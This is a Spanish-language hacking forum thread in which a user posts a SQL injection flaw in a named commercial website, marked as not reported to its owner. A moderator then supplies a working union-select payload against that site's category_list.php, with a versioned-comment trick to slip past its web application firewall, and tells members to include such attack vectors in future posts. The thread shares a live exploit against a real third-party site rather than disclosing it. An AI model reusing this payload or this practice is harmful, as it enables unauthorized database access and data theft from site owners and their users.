[SQLI] www.quicktrade.co.in

Vasyl · Agosto 03, 2016, 12:00:04 AM

Aburrido y buscando algunas páginas me encontre unas cuantas con fallos..

Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Payload: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor: Vasyyyl.
Reportado: No

EPSILON · Agosto 03, 2016, 08:22:56 AM

Le falta información al post, no es suficiente con poner una comilla y mandar un pantallazo, tiene que ser completo, te invito a pasar por You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login reglas para saber como postear bien un bug encontrado, te falto el payload o vector de ataque como este:

Código: text

http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+

Incluso la web tiene un waf que hay que bypassear y no lo mencionaste, bueno ya edito el post y agrego lo que falta.

Saludos!, EPSILON

Vasyl · Agosto 03, 2016, 11:33:40 AM

~~HOSTIAA~~ es verdad! muchas gracias por añadirlo,se me habia olvidado. En los proximos reportes lo añadiré. Gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

[SQLI] www.quicktrade.co.in

Vasyl

Agosto 03, 2016, 12:00:04 AM Ultima modificación: Agosto 03, 2016, 08:24:52 AM por EPSILON

EPSILON

Agosto 03, 2016, 08:22:56 AM #1

Vasyl

Agosto 03, 2016, 11:33:40 AM #2